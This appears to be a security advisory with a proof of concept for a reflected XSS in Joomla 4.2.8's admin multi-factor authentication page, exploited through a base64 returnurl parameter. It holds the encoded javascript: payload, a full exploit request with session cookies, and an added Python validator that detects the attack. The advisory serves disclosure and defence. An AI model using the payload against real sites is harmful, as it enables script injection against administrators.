Joomla V4.2.8 Backend Reflected-XSS

Description

The admin backend Multi-factor Authentication component is vulnerable to reflected XSS via the base64-encoded GET parameter returnurl.

Affected Version

Joomla <= 4.2.8

POC

  1. Log in to the Joomla CMS admin backend and open the Multi-factor Authentication component.
  2. Whether you add a new multi-factor authentication method or edit an existing one, the request always carries a base64-encoded URL parameter returnurl.
  3. The value of returnurl is base64-decoded and placed in the href attribute of the <a> tags behind the “Save & Close” and “Cancel” buttons.
  4. Change the value of returnurl to a base64-encoded XSS payload, e.g. amF2YXNjcmlwdDphbGVydCgxKTs=, which decodes to javascript:alert(1), and request the page with that returnurl parameter; the payload is injected into the href.

Full POC request:

GET /joomla/administrator/index.php?option=com_users&task=method.add&method=yubikey&user_id=220&returnurl=amF2YXNjcmlwdDphbGVydCgxKTs%3D HTTP/1.1
Host: 127.0.0.1:80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: atumSidebarState=open; 8bf89f010a5bbff54669e4ad47111f59=8nunecujukuvngvnu63fptrr0t; c04ce7edc2a8825a69f250555054fe73=ujj34jaqqm0md1cihnph0q3a20; PHPSESSID=enl8bvb5tmdfidt9kmvvekicr7
Connection: close
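As an added example (not part of the original report and not Joomla's own code), a Python check a defender can run over access-log request lines, or use as the server-side validation the component lacks: it base64-decodes returnurl as the report describes and accepts only relative paths or http(s) URLs on the site's own host. The allowed host value and the function names are assumptions.

```python
import base64
import binascii
import re
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Schemes acceptable for a back-link placed in an href. javascript:, data:,
# vbscript: and friends must never get there.
SAFE_SCHEMES = {"", "http", "https"}


def decode_returnurl(value: str) -> Optional[str]:
    """Decode the base64 returnurl value; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_safe_returnurl(decoded: str, allowed_host: str) -> bool:
    """Accept only a relative path or an absolute http(s) URL on allowed_host."""
    # Browsers strip tab/newline and leading controls before parsing a URL, so
    # "java\tscript:" still executes; strip all C0 controls and spaces first.
    cleaned = re.sub(r"[\x00-\x20]", "", decoded)
    if "\\" in cleaned:          # backslash tricks such as http:\\evil.example
        return False
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in SAFE_SCHEMES:
        return False
    # "//evil.example/..." is scheme-relative and would leave the site.
    if parts.netloc and parts.netloc.lower() != allowed_host.lower():
        return False
    return True


def check_request(request_line: str, allowed_host: str) -> Tuple[Optional[str], bool]:
    """Inspect one HTTP request line (as in an access log).
    Returns (decoded returnurl or None, True if the request should be flagged)."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None, False
    params = parse_qs(urlsplit(target).query)   # also undoes %3D -> '='
    if "returnurl" not in params:
        return None, False
    decoded = decode_returnurl(params["returnurl"][0])
    if decoded is None:
        return None, True       # not valid base64: malformed, worth a look
    return decoded, not is_safe_returnurl(decoded, allowed_host)
```

Run against the request line above with allowed host 127.0.0.1:80, the request is flagged because the decoded returnurl carries a javascript: scheme.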

Reference

Reported by Srpopty; the vulnerability was discovered using Corax.